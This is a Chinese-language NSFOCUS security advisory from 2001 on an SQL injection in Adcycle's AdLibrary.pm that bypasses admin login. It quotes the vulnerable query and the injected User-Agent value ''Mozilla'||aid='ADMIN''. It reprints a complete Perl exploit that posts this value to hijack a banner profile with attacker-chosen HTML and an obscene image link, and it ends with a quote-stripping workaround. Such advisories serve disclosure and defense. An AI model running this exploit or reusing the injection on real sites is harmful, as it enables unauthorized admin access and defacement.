安全研究
安全漏洞
Adcycle AdLibrary.pm 非法会话访问漏洞
发布日期:2001-02-26
更新日期:2001-02-26
受影响系统:
描述:
Adcycle.com Adcycle 0.78b
Adcycle.com Adcycle 0.77
- Linux
- Sun Solaris
- OpenBSD
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
- HP-UX
BUGTRAQ ID: 2393
CVE(CAN) ID: CAN-2001-0425
Adcycle是Adcycle.com开发的一套perl脚本,主要使用来管理banner,后台使用MySQL
数据库。
它存在一个安全问题,可能导致恶意用户绕过用户认证过程对数据库进行操作。
问题处在下列代码中:
AdLibrary.pm:
sub db_login() {
==>
if($verify==0){
$FOUND=0;
$sth = $dbh->prepare("SELECT * FROM login WHERE remote='$remote' && agent='$agent' ORDER BY stime DESC");
$sth->execute;
while(@login = $sth->fetchrow_array){
if(length($login[1])>1){
$verify=1;
$whoami=$login[1];
$pid=$mixer;
}
}
$sth->finish();
}
<==
}
如果用户设置agent为:
$agent = Mozilla' || aid='ADMIN
则就可能获取ADMIN用户的所有记录。(如果此时ADMIN用户已经登录的话)
利用其他cgi程序,攻击者也可能删除数据库记录。
<* 来源:Neil K (neilk@alldas.de) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Neil K (neilk@alldas.de)提供了如下演示代码:
#!/usr/bin/perl
#
#Adcycle v0.78b eXploit
#by neilk@alldas.de
#
#This script exploits a situation that allows a remote user to 'skip'
#authentication if the legitimate Admin is logged in or has not logged
#out properly since their last session.
#
#Shoutz to: tribunal, domz, all @alldas.de, mjm @gmc-online.de
# code segments borrowed from teleh0r @doglover.com
#
#http://news.alldas.de.
#
use strict;
use Socket;
banner();
if (@ARGV < 1) {
usage();
exit(1);
}
(my $target) = @ARGV;
my $clickurl="http://www.fuqu.com";
my $dir="cgi-bin/adcycle";
my $imageurl="http://www.hornylesbians.com/pr0n.gif";
my $cid="MT01";
my $bannerid=1;
my $agent = "Mozilla'||aid='ADMIN";
my $url = "click=$clickurl&image=$imageurl&pri=0&change=Update+Banner+1+Profile&option=AUT
O&border=1&align=CENTER&target=_blank&alt=h0h0h0h0&btext=%3Cfont+face%3D%
22verdana%22+size%3D2%3E%3Cstrong%3EClick+Here+to+Visit+our+Sponsor%3C%2Fstrong%
3E%3C%2Ffont%3E&html=%3C%21--+START+ADCYCLE.COM+RICH+MEDIA+HTML+CODE+--%3E%0D%0A%
3Ccenter%3E%0D%0A%3Ca+href%3D%22http%3A%2F%2F$target%2F$dir%2Fadclick.cgi%
3Fmanager%3Dadcycle.com%26cid%3D$cid%26b%3D1%26id%3DIDNUMBER%22+target%3D%22_top%
22%3E%0D%0A%3Cimg+src%3D%22$imageurl%22+width%3D468+height%3D60+border%3D1+ALT%3D%
22Script+Kiddiot+Attack!%22%3E%3C%2Fa%3E%3Cbr%3E%0D%0A%3Ca+href%3D%22http%3A%2F%
2F$target%2F$dir%2Fadclick.cgi%3Fmanager%3Dadcycle.com%26cid%3D$cid%26b%3D1%26id%
3DIDNUMBER%22+target%3D%22_top%22%3E%3Cfont+face%3D%22verdana%22+size%3D2%3E%
3Cstrong%3Eantionlinesuxhard%3C%2Fstrong%3E%3C%2Ffont%3E%3C%2Fa%3E%0D%0A%3C%
2Fcenter%3E%0D%0A+%3C%21--+END+ADCYCLE.COM+RICH+MEDIA+HTML+CODE+--%3E%0D%0A%0D%
0A&null=%3Ca+href%3D%22http%3A%2F%2F$target%2F$dir%2Fadclick.cgi%3Fmanager%
3Dadcycle.com%26cid%3D$cid%26b%3D1%26id%3DIDNUMBER%22%
3E&task=update_banner_profile&cid=$cid&banner=$bannerid&pg=2";
my $url_length = length($url);
my $request=
"POST /$dir/adcenter.cgi HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $url_length
$url
";
my $iaddr = inet_aton($target);
my $paddr = sockaddr_in(80, $iaddr);
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, 'tcp');
connect(SOCKET, $paddr);
send(SOCKET,"$request", 0);
close(SOCKET);
exit(1);
sub banner {
print "\nAdcycle eXploit for V0.77b/0.78b\n";
print "by Neilk (neilk\@alldas.de/neil\@alldas.de)\n";
print "http://www.alldas.de\n\n";
}
sub usage {
print "Usage:\tperl $0 <target ip>\n\n";
}
建议:
临时解决方法:
NSFOCUS建议您按照漏洞发现者所提供的临时解决方法来修改脚本:
AdLibrary.pm:
sub db_login {
=>
my $agent=$env->get_agent;
+ while($agent =~ s/'// !=0 ){}
my $cookie=$env->get_cookie;
my $datestamp=$env->get_datestamp;
my $admin_user_name=$config->get_admin_user_name;
=>
if($verify==0){
my($trash,$mycookname,$mycookpid)=split(/\!\!/,$cookie);
+ while($mycookpid =~ s/'// !=0 ){}
=>
$FOUND=0;
$sth = $dbh->prepare("SELECT * FROM login WHERE pid='$mycookpid' && agent='$agent' ORDER BY stime DESC");
$sth->execute;
while(@login = $sth->fetchrow_array){
if(length($login[1])>1){
$verify=1;
$whoami=$login[1];
$pid=$mycookpid;
}
}
$sth->finish();
}
<=
}
厂商补丁:
暂无
浏览次数:10313
严重程度:0(网友投票)
绿盟科技给您安全的保障